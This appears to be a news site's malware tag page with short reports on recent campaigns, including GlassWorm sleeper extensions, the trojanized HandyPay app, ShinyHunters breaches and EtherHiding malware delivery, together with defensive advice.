Tag: malware

The GlassWorm attack intensifies with the discovery of 73 new extensions

The supply chain attack known as GlassWorm has recently escalated with the identification of 73 new sleeper extensions in the Open VSX market. This development, which occurred in April 2026, represents a dangerous evolution in the way threat actors distribute malware to software developers. This group of extensions follows a previous wave detected in March 2026, which had already documented 72 malicious extensions associated with the same operation. The evolution of malicious extensions The new tactics employed by the attackers aim to evade security scans. […]

The supply chain attack known as GlassWorm has recently escalated with the identification of 73 new sleeping extensions in the Open VSX marketplace. This development, which occurred in April 2026, represents a dangerous evolution in the way threat actors distribute malware to software developers. This group of extensions follows a previous wave detected in March 2026, which had already documented 72 malicious extensions associated with the same operation.

The evolution of malicious extensions

The new tactics employed by attackers aim to evade security scans. Previously, variants of this attack exploited dependency features of extensions to silently install malicious loaders. In contrast, the sleeping extensions are fake packages published before being activated, which initially seem harmless to build trust and accumulate downloads.

To carry out their operations, attackers create fraudulent accounts on GitHub to publish cloned versions of popular tools. A clear example is a fake extension of the Turkish Language Pack for Visual Studio Code, which closely emulates the legitimate version, even copying its icon and description, only changing the name of the publisher. Once developers install these cloned tools, the attackers wait to launch a software update that delivers the malware. At least six of the 73 new extensions have already been activated, serving as loaders to obtain external malware payloads.

The malicious code is no longer visible in the source code of the extension, which increases the opportunities to evade detection. Security teams must be vigilant for certain indicators of compromise, and it is crucial for developers to verify the namespaces of the editors and carefully review the download accounts before installing any extension from the Open VSX marketplace.

Beware! The HandyPay app captures your card information without permission

A new and more dangerous version of the NGate malware has been detected hidden in a payment NFC application known as HandyPay. This malicious software has been active since November 2025 and uses artificial intelligence to write its code, marking a significant shift in the techniques employed by cybercriminals to develop attack tools. Do not enter your card PIN in unknown applications The HandyPay application, which is originally legitimate and available on Google Play since 2021, has been trojanized. The attackers have distributed this malicious version outside the official store, using two distinct channels. The […]

A new and more dangerous version of the NGate malware hidden in a payment NFC application known as HandyPay has been detected. This malicious software has been active since November 2025 and uses artificial intelligence to write its code, marking a significant shift in the techniques employed by cybercriminals to develop attack tools.


Do not enter your card PIN in unknown applications

The HandyPay application, which is originally legitimate and available on Google Play since 2021, has been trojanized. The attackers have distributed this malicious version outside the official store, using two distinct channels. The first involves a fake lottery website that simulates being the Brazilian lottery organization Rio de Premios, where users are lured with a fraudulent scratch card game. The second channel involves a fake Google Play page aimed at deceiving users into downloading the malware under the name Card Protection.

Once the application is installed, HandyPay asks the user to set it as the default NFC payment app. This seems harmless as it is part of the original functionality of the app. However, when the user enters their card PIN and brings their card close to the phone, the malware captures the card information and sends it to the attacker-controlled device without requiring special permissions, making it difficult to detect.

Researchers from WeLiveSecurity have identified that the malicious code contains signs of generation by artificial intelligence. Users are advised to download paid applications only from official sources and to enable Google Play Protect for added security. Additionally, it is crucial not to enter the card PIN in unknown applications, especially those that seem to offer prizes or card protection.

Cybercriminals are changing tactics: Data exfiltration and extortion on the rise

A recent report from Arctic Wolf highlights a significant shift in the tactics of cyber attackers, who have begun to abandon encryption in favor of data exfiltration and extortion. This turn has emerged as a response to the pursuit of better economic returns, contributing to a new wave of attacks where ransomware is no longer the only approach. In fact, ransomware accounted for 44% of response incidents during the analyzed period. New strategies from criminals The manufacturing sector has become the most affected, followed by […]

A recent report from Arctic Wolf highlights a significant shift in the tactics of cyber attackers, who have begun to abandon encryption in favor of data exfiltration and extortion. This shift has emerged as a response to the pursuit of better economic returns, contributing to a new wave of attacks where ransomware is no longer the sole focus. In fact, ransomware accounted for 44% of the response incidents during the analyzed period.

New strategies of criminals

The manufacturing sector has become the most affected, followed by law firms, schools, financial institutions, and health organizations. These sectors account for the majority of attacks, reflecting the growing impact of cyber threats on key industries of the economy. Furthermore, ransomware gangs have adopted affiliate models, allowing for greater interconnection between different groups, making them more competitive and harder to stop.

The report indicates that police interactions have weakened groups like LockBit, ALPHV/BlackCat, and BlackSuit, suggesting that law enforcement efforts have had some effect on their operability. However, other types of attacks, such as business email compromise, have proliferated, representing 26% of the cases investigated by Arctic Wolf. Most of these attacks have targeted financial and legal organizations, with a notable use of email phishing as the initial access method in 85% of the compared cases.

In addition, attackers have shown a particular preference for compromising remote access tools, such as Remote Desktop Protocol and remote management software, which account for two-thirds of cases unrelated to BEC, a significant increase compared to previous years. This shift in tactics underscores the adaptability and operational maturity of cybercriminals in a constantly evolving technological landscape.

Bumble and Match are victims of a cyberattack that reveals internal data

The dating apps Bumble and Match have been attacked by the cybercriminal group known as ShinyHunters, responsible for compromising internal data from multiple large companies. According to reports, the group has added both companies to its data leak site, claiming the theft of thousands of documents classified as restricted and confidential, primarily sourced from Google Drive and Slack. Dating sometimes doesn’t go well Bloomberg notes that Bumble, which also operates Badoo and BFF, contacted authorities after one of its contractors’ accounts was compromised in a phishing incident

The dating apps Bumble and Match have been attacked by the cybercriminal group known as ShinyHunters, responsible for compromising internal data from multiple large companies. According to reports, the group has added both companies to its data leak site, claiming the theft of thousands of documents classified as restricted and confidential, primarily sourced from Google Drive and Slack.

Sometimes dates don’t go well

Bloomberg reports that Bumble, which also operates Badoo and BFF, contacted authorities after one of its contractors’ accounts was compromised in a phishing incident. A spokesperson for Bumble stated that the attackers were able to unauthorizedly access a small portion of their network, but they do not believe that member data, including accounts, direct messages, or profiles, has been affected.

For its part, Match confirmed that it suffered a cyber incident on January 28, which impacted a limited amount of user data. The company is notifying the affected individuals and assured that there is no evidence that access credentials, financial information, or private communications have been compromised.

ShinyHunters has been in the spotlight recently for its successful attacks on several large companies and for its focus on data exfiltration, having abandoned the practice of ransomware. This group has been targeting single sign-on platforms like Okta and Microsoft, and there are warnings for organizations, especially in the United States, about phishing attempts by individuals impersonating technical support staff.

These new phishing tactics that take advantage of trust among senior executives

Recently, a sophisticated phishing attack has put companies on alert, especially those operating in the Middle East. Malicious actors managed to impersonate an ongoing email thread between high-level executives, using a phishing link that mimicked a Microsoft authentication form, demonstrating a clever execution of social engineering. The clever impersonation technique The attack began with a compromised sales manager account in a contracting company, allowing the insertion of a malicious message into a legitimate conversation. This tactic exploits trust […]

Recently, a sophisticated phishing attack has put companies on alert, especially those operating in the Middle East. Malicious actors managed to impersonate an ongoing email thread between high-level executives, using a phishing link that mimicked a Microsoft authentication form, demonstrating a clever execution of social engineering.

The Ingenious Identity Theft Technique

The attack began with a compromised sales manager account at a contracting company, allowing the insertion of a malicious message into a legitimate conversation. This tactic, which exploits trust and communication within organizations, has proven to be particularly effective, as attackers took advantage of genuine emails between employees to create an appearance of normalcy in their phishing emails.

Researchers have linked the incursion to an active campaign since December 2025, which has primarily targeted companies in the financial and energy sectors in the region. The investigation revealed the use of EvilProxy, a phishing tool that evades traditional detections, by introducing a proxy system that allows attackers to operate undetected.

This type of attack not only takes advantage of technical vulnerabilities but also crafts human workflows, making emails appear perfect, which makes them harder to detect by filtering systems like DMARC. As remote work becomes normalized and asynchronous approval processes become common, companies face an increased risk of compromises.

The importance of having adequate defense measures has grown significantly. Tools like ANY.RUN provide the ability to detect phishing behaviors in real-time, shortening response times to incidents and strengthening corporate cybersecurity.

The rise of AI-generated malware poses new threats to cybersecurity

Security researchers have warned of an alarming increase in the development of malware using artificial intelligence tools, marking a significant transition from the theoretical to the practical in cybercrime. This phenomenon has been documented by the cybersecurity firm Check Point Research, which has analyzed the activities of a well-known state-backed threat actor from North Korea, known as KONNI, which has been active for over a decade. The evolution of cyber threats Initially, KONNI’s focus was on politicians, diplomats, and academics, primarily in South Korea. However, in its latest campaign, […]

Security researchers have warned of an alarming increase in the development of malware using artificial intelligence tools, marking a significant transition from the theoretical realm to practical applications in cybercrime. This phenomenon has been documented by the cybersecurity firm Check Point Research, which has analyzed the activities of a well-known state-backed threat actor from North Korea, known as KONNI, which has been active for over a decade.

The evolution of cyber threats

Initially, KONNI’s focus was on politicians, diplomats, and academics, primarily in South Korea. However, in its latest campaign, the group has changed its strategy, targeting software developers, especially those related to blockchain and cryptocurrencies. The attackers have been using highly convincing phishing techniques to access cloud infrastructures, source code repositories, and blockchain credentials.

CPR researchers explain that those who have fallen into the trap have allowed the installation of an AI-generated backdoor in PowerShell, which has provided attackers with full access to the victims’ computers and the secrets stored on them. This use of AI-generated malware not only accelerates the development of new attacks but also allows for faster and more flexible customization of threats, thereby evading traditional signature-based detection methods.

In light of this new reality, cybersecurity professionals will need to adapt their approaches. There is an emphasis on the need to consider development environments as high-value targets and to strengthen prevention against phishing within collaboration and development workflows. Additionally, it is recommended to protect development infrastructures and the cloud with robust access controls and to use AI-driven threat prevention techniques to detect malware that is not visible in the early stages of an attack.

A malicious Chrome extension redirects cryptocurrency exchange platforms

A new finding in the field of cybersecurity has revealed the existence of a malicious extension in the Chrome Web Store, called Crypto Copilot. This tool allows for the injection of a hidden transfer of Solana in exchange transactions, redirecting funds to a wallet controlled by the attackers, which raises serious concerns about user security in the cryptocurrency ecosystem. Be careful if you use cryptocurrencies The extension, published by a user under the pseudonym ‘sjclark76’, has achieved 12 installations and remains available for download. According to security researchers, Crypto Copilot presents a legitimate facade by offering […]

A new finding in the field of cybersecurity has revealed the existence of a malicious extension in the Chrome Web Store, called Crypto Copilot. This tool allows for the injection of a hidden transfer of Solana in exchange transactions, redirecting funds to a wallet controlled by the attackers, raising serious concerns about user security in the cryptocurrency ecosystem.

Be Careful if You Use Cryptocurrencies

The extension, published by a user under the pseudonym ‘sjclark76’, has achieved 12 installations and remains available for download. According to security researchers, Crypto Copilot presents a legitimate facade by offering users the ability to trade crypto directly on X with real-time information and seamless execution. However, behind this interface, there is malicious behavior that is triggered when trading on Raydium, a decentralized exchange based on the Solana blockchain.

The extension’s code is obfuscated to avoid detection and manipulates the process by adding an additional transfer of SOL each time a user signs a transaction. This additional transfer charges a minimum of 0.0013 SOL or 0.05% of the exchanged amount, with the money diverted to a hardcoded wallet in the extension’s code. Users may not realize this hidden transfer unless they review each instruction before signing.

Despite the fact that Crypto Copilot is presented as a useful tool that makes use of legitimate services like DexScreener and Helius RPC, its goal seems to be solely to perpetuate fraud at the expense of unsuspecting users. This type of attack highlights the need for constant vigilance in the use of digital tools in the cryptocurrency space.

A new malware for MacOS has been discovered that targets user credentials

Recent research has revealed the existence of a new malware strain on macOS, attributed to the group known as FlexibleFerret. This sophisticated threat uses multi-stage scripts and a backdoor built in Go to infiltrate users’ systems, with the specific goal of stealing credentials and maintaining access to their devices. Threatening the most secure system The malware implements a layered approach to evade detection, starting with scripts that prepare the ground for the installation of the backdoor. This methodology allows attackers to establish a persistent connection with the compromised system, facilitating the […]

Recent investigations have revealed the existence of a new malware strain on macOS, attributed to the group known as FlexibleFerret. This sophisticated threat uses multi-stage scripts and a ‘backdoor’ built in Go to infiltrate users’ systems, with the specific aim of stealing credentials and maintaining access to their devices.

Threatening the most secure system

The malware implements a layered approach to evade detection, starting with scripts that prepare the ground for the installation of the backdoor. This methodology allows attackers to establish a persistent connection with the compromised system, facilitating the theft of sensitive data, such as usernames and passwords.

FlexibleFerret seems to be especially aimed at macOS users, highlighting the growing concern for the security of this operating system. Traditionally, Apple devices have been considered more secure against malware compared to their Windows counterparts, but this new threat challenges that perception. With the rise of remote work and greater reliance on digital platforms, the risk of suffering an attack like FlexibleFerret is more relevant than ever.

Cybersecurity experts warn that this type of malware underscores the importance of maintaining robust security practices, including the implementation of two-factor authentication and active monitoring of sensitive account activity. Additionally, users are advised to keep their systems updated and use reliable antivirus software to protect against future threats.

It remains to be seen to what extent these attack techniques will expand and whether macOS users will be able to withstand the growing tide of malware designed to compromise their systems and steal personal information. Meanwhile, the cybersecurity community remains alert and is working to counter this and other emerging threats.

North Korean hackers discover a way to steal cryptocurrencies through the blockchain

North Korean hackers have developed new cyberattack techniques that compromise cybersecurity, according to a recent report from Google. These tactics, which employ sophisticated methods, represent a concerning evolution in the way threat actors carry out their operations in cyberspace. Your money is also not safe in the blockchain One of the most alarming strategies identified is the use of EtherHiding, a blockchain-based technique. This method allows for the concealment of malware delivery through the use of transactions on Ethereum, making detection by security systems more difficult.

North Korean hackers have developed new cyberattack techniques that compromise computer security, according to a recent report from Google. These tactics, which employ sophisticated methods, represent a concerning evolution in the way threat actors carry out their operations in cyberspace.

Your money is not safe on the blockchain either

One of the most concerning strategies identified is the use of EtherHiding, a technique based on blockchain. This method allows for the concealment of malware delivery through the use of transactions on Ethereum, making it difficult for security systems to detect. By hiding the malware within legitimate blockchain traffic, attackers can bypass conventional protective measures and increase their chances of success.

The main objective of these attacks is the theft of cryptocurrencies from users. Using this technique, hackers take advantage of the growing popularity of cryptocurrencies and the lack of experience of some users in digital security. The malware, once delivered, can steal confidential information, such as private keys and access data to digital wallets, thus facilitating access to the victims’ funds.

This finding highlights the urgent need for cryptocurrency users to adopt stricter security measures, such as two-factor authentication and regular reviews of their financial activities. Meanwhile, cryptocurrency exchange platforms are advised to be vigilant against such threats and to improve their security protocols to protect their users.

While it has been confirmed that North Korean hackers are using these advanced techniques, they can be expected to continue adapting and evolving in response to cyber defenses. The cybersecurity community will need to remain vigilant to counter this new wave of attacks.

ChatGPT DOWNLOAD

The group of cyber threats that uses smart contracts to distribute malware

A group of cyber threats known as UNC5142 has been observed using smart contracts on the blockchain to distribute malware aimed at stealing information, affecting both Windows and macOS systems. Among the types of malware used are Atomic, Lumma, and Vidar. This innovative approach, called EtherHiding, hides the malicious code in the BNB Smart … Continue reading “”

A group of cyber threats known as UNC5142 has been observed using smart contracts on the blockchain to distribute malware aimed at stealing information, affecting both Windows and macOS systems. Among the types of malware used are Atomic, Lumma, and Vidar. This innovative approach, called EtherHiding, hides the malicious code in the BNB Smart Chain, allowing its activities to blend in with legitimate Web3 transactions.

Thousands of compromised websites

According to reports from the Google Threat Intelligence Group , around 14,000 compromised web pages have been flagged for containing malicious JavaScript, illustrating their indiscriminate approach towards vulnerable WordPress sites. UNC5142 uses compromised websites to inject this code, allowing malware distribution to occur through a multi-stage process. A key component is the JavaScript downloader called CLEARSHORT, which facilitates malware delivery through infected sites.

Since November 2024, UNC5142 has evolved from a single contract system to a more complex strategy involving three smart contracts, thereby improving the operational agility of its campaigns. This architecture resembles a software design principle known as the proxy pattern, allowing for quick updates in critical parts of the attack without the need to modify the JavaScript on the compromised sites.

These smart contracts allow UNC5142 to adapt the upload URL. Furthermore, the analysis has revealed two distinct infrastructures of smart contracts that facilitate the distribution of malware, demonstrating their ability to adapt and maintain the resilience of their operations.

These sophisticated methods not only increase the risk for Internet users, but also make it difficult to detect and eliminate their malicious activities. Although Google has not detected activity from UNC5142 since July 2025, this could indicate a pause in their actions or a change in their operational strategy.